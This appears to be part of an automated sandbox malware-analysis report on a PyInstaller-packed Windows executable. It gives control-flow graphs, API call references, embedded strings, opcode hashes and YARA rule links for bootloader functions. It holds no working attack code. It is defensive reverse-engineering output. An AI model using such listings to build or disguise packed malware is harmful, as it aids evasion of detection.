                                                                                                                                                                                                            • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                                                                                                            • API String ID: 3752271684-1116378104
                                                                                                                                                                                                            • Opcode ID: dd061f857628f8cce594bc41954d9e76e8095696f5180e2e17042c5623d0381d
                                                                                                                                                                                                            • Instruction ID: 10888fb71a76abedbea3f54483dca49de9895716b1a06f1e90fd6b8427e96a6c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd061f857628f8cce594bc41954d9e76e8095696f5180e2e17042c5623d0381d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A51C235B0F68374FE54B7269A162BAE2559F44BC1FC65031EC0E6B7B6EE2CE4018720
                                                                                                                                                                                                            Function 00007FF7ACEA4FCC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 773 7ff7acea4fcc-7ff7acea5001 call 7ff7acea46d8 call 7ff7acea46e0 call 7ff7acea4748 780 7ff7acea513f-7ff7acea51ad call 7ff7ace99d00 call 7ff7acea05e8 773->780 781 7ff7acea5007-7ff7acea5012 call 7ff7acea46e8 773->781 793 7ff7acea51af-7ff7acea51b6 780->793 794 7ff7acea51bb-7ff7acea51be 780->794 781->780 786 7ff7acea5018-7ff7acea5023 call 7ff7acea4718 781->786 786->780 792 7ff7acea5029-7ff7acea504c call 7ff7ace99d48 GetTimeZoneInformation 786->792 805 7ff7acea5052-7ff7acea5073 792->805 806 7ff7acea5114-7ff7acea513e call 7ff7acea46d0 call 7ff7acea46c0 call 7ff7acea46c8 792->806 798 7ff7acea524b-7ff7acea524e 793->798 796 7ff7acea51c0 794->796 797 7ff7acea51f5-7ff7acea5208 call 7ff7ace9c9fc 794->797 800 7ff7acea51c3 796->800 809 7ff7acea5213-7ff7acea522e call 7ff7acea05e8 797->809 810 7ff7acea520a 797->810 799 7ff7acea5254-7ff7acea525c call 7ff7acea4d50 798->799 798->800 807 7ff7acea51c8-7ff7acea51f4 call 7ff7ace99d48 call 7ff7ace8acd0 799->807 800->807 808 7ff7acea51c3 call 7ff7acea4fcc 800->808 812 7ff7acea5075-7ff7acea507b 805->812 813 7ff7acea507e-7ff7acea5085 805->813 808->807 832 7ff7acea5230-7ff7acea5233 809->832 833 7ff7acea5235-7ff7acea5247 call 7ff7ace99d48 809->833 817 7ff7acea520c-7ff7acea5211 call 7ff7ace99d48 810->817 812->813 819 7ff7acea5087-7ff7acea508f 813->819 820 7ff7acea5099 813->820 817->796 819->820 826 7ff7acea5091-7ff7acea5097 819->826 822 7ff7acea509b-7ff7acea510f call 7ff7ace8c150 * 4 call 7ff7acea1bac call 7ff7acea5264 * 2 820->822 822->806 826->822 832->817 833->798
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA4FFA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4748: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA475C
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA500B
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA46E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA46FC
                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF7ACEA501C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACEA4718: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACEA472C
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7ACEA525C), ref: 00007FF7ACEA5043
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                            • API String ID: 3458911817-239921721
                                                                                                                                                                                                            • Opcode ID: 6f592b97884ad86c6c5862fa308072426eccbbb8b3cbff7b01d41fc1ca71d458
                                                                                                                                                                                                            • Instruction ID: ac9bf935b0cae6e4f66910006810c6ae978cf18dca6ee422b6086e60a12a7dfd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f592b97884ad86c6c5862fa308072426eccbbb8b3cbff7b01d41fc1ca71d458
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A751A772A0EA42AAE710FF21D5811B9F760FB48745FC64135EA4D976B5DF3CE5008760
                                                                                                                                                                                                            Function 00007FF7ACE817B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2153230061-4158440160
                                                                                                                                                                                                            • Opcode ID: 13762b2058ec530e2b5e413417343aa55c920a4c03f546ab3d2e9fe5047cea8e
                                                                                                                                                                                                            • Instruction ID: 2bf2c02124c62f8ea5b6fad07ba3e8c1b5f6a01171734c86714095ebadadf1dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13762b2058ec530e2b5e413417343aa55c920a4c03f546ab3d2e9fe5047cea8e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53519272A0E682A6EB54EF24D55017CB3A0FF48B49B969135D90DA73B9DF3CE440CB60
                                                                                                                                                                                                            Function 00007FF7ACE81440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 53 7ff7ace81440-7ff7ace81457 call 7ff7ace86700 56 7ff7ace81459-7ff7ace81461 53->56 57 7ff7ace81462-7ff7ace81485 call 7ff7ace86a20 53->57 60 7ff7ace814a7-7ff7ace814ad 57->60 61 7ff7ace81487-7ff7ace814a2 call 7ff7ace824d0 57->61 62 7ff7ace814e0-7ff7ace814f4 call 7ff7ace8f864 60->62 63 7ff7ace814af-7ff7ace814ba call 7ff7ace83c90 60->63 70 7ff7ace81635-7ff7ace81647 61->70 72 7ff7ace81516-7ff7ace8151a 62->72 73 7ff7ace814f6-7ff7ace81511 call 7ff7ace824d0 62->73 68 7ff7ace814bf-7ff7ace814c5 63->68 68->62 71 7ff7ace814c7-7ff7ace814db call 7ff7ace82770 68->71 83 7ff7ace81617-7ff7ace8161d 71->83 76 7ff7ace8151c-7ff7ace81528 call 7ff7ace81050 72->76 77 7ff7ace81534-7ff7ace81554 call 7ff7ace93fe0 72->77 73->83 84 7ff7ace8152d-7ff7ace8152f 76->84 85 7ff7ace81556-7ff7ace81570 call 7ff7ace824d0 77->85 86 7ff7ace81575-7ff7ace8157b 77->86 87 7ff7ace8162b-7ff7ace8162e call 7ff7ace8f1dc 83->87 88 7ff7ace8161f call 7ff7ace8f1dc 83->88 84->83 99 7ff7ace8160d-7ff7ace81612 85->99 90 7ff7ace81605-7ff7ace81608 call 7ff7ace93fcc 86->90 91 7ff7ace81581-7ff7ace81586 86->91 98 7ff7ace81633 87->98 97 7ff7ace81624 88->97 90->99 96 7ff7ace81590-7ff7ace815b2 call 7ff7ace8f52c 91->96 102 7ff7ace815e5-7ff7ace815ec 96->102 103 7ff7ace815b4-7ff7ace815cc call 7ff7ace8fc6c 96->103 97->87 98->70 99->83 104 7ff7ace815f3-7ff7ace815fb call 7ff7ace824d0 102->104 109 7ff7ace815ce-7ff7ace815d1 103->109 110 7ff7ace815d5-7ff7ace815e3 103->110 111 7ff7ace81600 104->111 109->96 112 7ff7ace815d3 109->112 110->104 111->90 112->111
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                            • API String ID: 0-666925554
                                                                                                                                                                                                            • Opcode ID: 3b2bdab1e2625c01a1f45d967a760f062dcd1c0112ef139deb3c6ade96a22823
                                                                                                                                                                                                            • Instruction ID: a7fc1a1fd731f13f7e876c85c43d5293fea151095c3938a644b0df026b126a96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b2bdab1e2625c01a1f45d967a760f062dcd1c0112ef139deb3c6ade96a22823
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851CC71B0E782A5EA10BB11E6046B9F3A0AF41BE6F860031DD0D677B6EE3CE1458760
                                                                                                                                                                                                            Function 00007FF7ACE87810 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                            • API String ID: 4998090-2855260032
                                                                                                                                                                                                            • Opcode ID: af43192e558f9788d8e79a42a8209ba7990e18510bead9af3882adaa3d55134e
                                                                                                                                                                                                            • Instruction ID: 969b948f3fdb2a544950ed6ba1935ade683a4ef494db15deae2b2830ab80e4c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af43192e558f9788d8e79a42a8209ba7990e18510bead9af3882adaa3d55134e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A53261D782A6E750AF11E4446AAF361FB84795F850231FA5E67AF4DF3CD408CB10
                                                                                                                                                                                                            Function 00007FF7ACE86F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84processsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                            • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                            • API String ID: 2895956056-3524285272
                                                                                                                                                                                                            • Opcode ID: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction ID: 4f9e873300a92253e0117d9ded76cb3d5eae266f2d8749af7d48b1a5b51708c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f16b07142fd6e9cf00bc922e8cc9db10b45bb18e926ceaba9689dfbd1de94f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9415F32A0D7C2A6EA20EB20F4552AEF3A4FBD4341F810135E69D67BA5DF7CD1548B50
                                                                                                                                                                                                            Function 00007FF7ACE81000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 383 7ff7ace81000-7ff7ace83666 call 7ff7ace8efb0 call 7ff7ace8efa8 call 7ff7ace87570 call 7ff7ace8efa8 call 7ff7ace8ad00 call 7ff7ace941a0 call 7ff7ace94e44 call 7ff7ace81af0 401 7ff7ace8366c-7ff7ace8367b call 7ff7ace83b80 383->401 402 7ff7ace8377a 383->402 401->402 407 7ff7ace83681-7ff7ace83694 call 7ff7ace83a50 401->407 404 7ff7ace8377f-7ff7ace8379f call 7ff7ace8acd0 402->404 407->402 411 7ff7ace8369a-7ff7ace836ad call 7ff7ace83b00 407->411 411->402 414 7ff7ace836b3-7ff7ace836da call 7ff7ace86970 411->414 417 7ff7ace8371c-7ff7ace83744 call 7ff7ace86f10 call 7ff7ace819d0 414->417 418 7ff7ace836dc-7ff7ace836eb call 7ff7ace86970 414->418 429 7ff7ace8382d-7ff7ace8383e 417->429 430 7ff7ace8374a-7ff7ace83760 call 7ff7ace819d0 417->430 418->417 424 7ff7ace836ed-7ff7ace836f3 418->424 426 7ff7ace836f5-7ff7ace836fd 424->426 427 7ff7ace836ff-7ff7ace83719 call 7ff7ace93fcc call 7ff7ace86f10 424->427 426->427 427->417 432 7ff7ace83853-7ff7ace8386b call 7ff7ace879a0 429->432 433 7ff7ace83840-7ff7ace8384a call 7ff7ace83260 429->433 442 7ff7ace83762-7ff7ace83775 call 7ff7ace82770 430->442 443 7ff7ace837a0-7ff7ace837a3 430->443 447 7ff7ace8387e-7ff7ace83885 SetDllDirectoryW 432->447 448 7ff7ace8386d-7ff7ace83879 call 7ff7ace82770 432->448 445 7ff7ace8384c 433->445 446 7ff7ace8388b-7ff7ace83898 call 7ff7ace85e20 433->446 442->402 443->429 444 7ff7ace837a9-7ff7ace837c0 call 7ff7ace83c90 443->444 458 7ff7ace837c7-7ff7ace837f3 call 7ff7ace87170 444->458 459 7ff7ace837c2-7ff7ace837c5 444->459 445->432 456 7ff7ace8389a-7ff7ace838aa call 7ff7ace85ac0 446->456 457 7ff7ace838e6-7ff7ace838eb call 7ff7ace85da0 446->457 447->446 448->402 456->457 471 7ff7ace838ac-7ff7ace838bb call 7ff7ace85620 456->471 464 7ff7ace838f0-7ff7ace838f3 457->464 472 7ff7ace8381d-7ff7ace8382b 458->472 473 7ff7ace837f5-7ff7ace837fd call 7ff7ace8f1dc 458->473 462 7ff7ace83802-7ff7ace83818 call 7ff7ace82770 459->462 462->402 469 7ff7ace838f9-7ff7ace83906 464->469 470 7ff7ace839a6-7ff7ace839b5 call 7ff7ace830f0 464->470 474 7ff7ace83910-7ff7ace8391a 469->474 470->402 487 7ff7ace839bb-7ff7ace839f2 call 7ff7ace86ea0 call 7ff7ace86970 call 7ff7ace853c0 470->487 485 7ff7ace838bd-7ff7ace838c9 call 7ff7ace855b0 471->485 486 7ff7ace838dc-7ff7ace838e1 call 7ff7ace85870 471->486 472->433 473->462 478 7ff7ace8391c-7ff7ace83921 474->478 479 7ff7ace83923-7ff7ace83925 474->479 478->474 478->479 483 7ff7ace83927-7ff7ace8394a call 7ff7ace81b30 479->483 484 7ff7ace83971-7ff7ace839a1 call 7ff7ace83250 call 7ff7ace83090 call 7ff7ace83240 call 7ff7ace85870 call 7ff7ace85da0 479->484 483->402 497 7ff7ace83950-7ff7ace8395b 483->497 484->404 485->486 498 7ff7ace838cb-7ff7ace838da call 7ff7ace85c70 485->498 486->457 487->402 510 7ff7ace839f8-7ff7ace83a0b call 7ff7ace83250 call 7ff7ace86f50 487->510 501 7ff7ace83960-7ff7ace8396f 497->501 498->464 501->484 501->501 518 7ff7ace83a10-7ff7ace83a2d call 7ff7ace85870 call 7ff7ace85da0 510->518 523 7ff7ace83a37-7ff7ace83a41 call 7ff7ace81ab0 518->523 524 7ff7ace83a2f-7ff7ace83a32 call 7ff7ace86c10 518->524 523->404 524->523
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE83B80: GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7ACE83885
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                            • API String ID: 2344891160-3602715111
                                                                                                                                                                                                            • Opcode ID: c011bbb1c264114e79645d427b78868edf0acf487d90ef09386e80cb89f30d10
                                                                                                                                                                                                            • Instruction ID: 6459782b4f997882763a611c0427ed71f68e65b52eb2cd9f457faef7723bcbdc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c011bbb1c264114e79645d427b78868edf0acf487d90ef09386e80cb89f30d10
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B1B331A1E6C365FE60BB25DA512BEB290BF40786FC64031E94D676F6EE2CE504C760
                                                                                                                                                                                                            Function 00007FF7ACE81050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 528 7ff7ace81050-7ff7ace810ab call 7ff7ace898b0 531 7ff7ace810ad-7ff7ace810d2 call 7ff7ace82770 528->531 532 7ff7ace810d3-7ff7ace810eb call 7ff7ace93fe0 528->532 537 7ff7ace810ed-7ff7ace81104 call 7ff7ace824d0 532->537 538 7ff7ace81109-7ff7ace81119 call 7ff7ace93fe0 532->538 543 7ff7ace8126c-7ff7ace81281 call 7ff7ace895a0 call 7ff7ace93fcc * 2 537->543 544 7ff7ace8111b-7ff7ace81132 call 7ff7ace824d0 538->544 545 7ff7ace81137-7ff7ace81147 538->545 561 7ff7ace81286-7ff7ace812a0 543->561 544->543 547 7ff7ace81150-7ff7ace81175 call 7ff7ace8f52c 545->547 554 7ff7ace8125e 547->554 555 7ff7ace8117b-7ff7ace81185 call 7ff7ace8f2a0 547->555 557 7ff7ace81264 554->557 555->554 562 7ff7ace8118b-7ff7ace81197 555->562 557->543 563 7ff7ace811a0-7ff7ace811c8 call 7ff7ace87d20 562->563 566 7ff7ace811ca-7ff7ace811cd 563->566 567 7ff7ace81241-7ff7ace8125c call 7ff7ace82770 563->567 568 7ff7ace8123c 566->568 569 7ff7ace811cf-7ff7ace811d9 566->569 567->557 568->567 571 7ff7ace811db-7ff7ace811e8 call 7ff7ace8fc6c 569->571 572 7ff7ace81203-7ff7ace81206 569->572 577 7ff7ace811ed-7ff7ace811f0 571->577 575 7ff7ace81219-7ff7ace8121e 572->575 576 7ff7ace81208-7ff7ace81216 call 7ff7ace8baa0 572->576 575->563 579 7ff7ace81220-7ff7ace81223 575->579 576->575 582 7ff7ace811fe-7ff7ace81201 577->582 583 7ff7ace811f2-7ff7ace811fc call 7ff7ace8f2a0 577->583 580 7ff7ace81237-7ff7ace8123a 579->580 581 7ff7ace81225-7ff7ace81228 579->581 580->557 581->567 585 7ff7ace8122a-7ff7ace81232 581->585 582->567 583->575 583->582 585->547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: 1.2.12$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-1282086711
                                                                                                                                                                                                            • Opcode ID: 75d1a68724760233d3b72529ab63010b96afae0e80c6ccec508cc015e5722427
                                                                                                                                                                                                            • Instruction ID: 8b557977b753fb909f089ed40b161a4988453b1268fb2e32596d7bc0b018bedb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75d1a68724760233d3b72529ab63010b96afae0e80c6ccec508cc015e5722427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51E332A0E6C2A5EA60BB11E5403BAB2A0BB80795FC64135ED4DA37A5EF3CE445C750
                                                                                                                                                                                                            Function 00007FF7ACE9AE5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
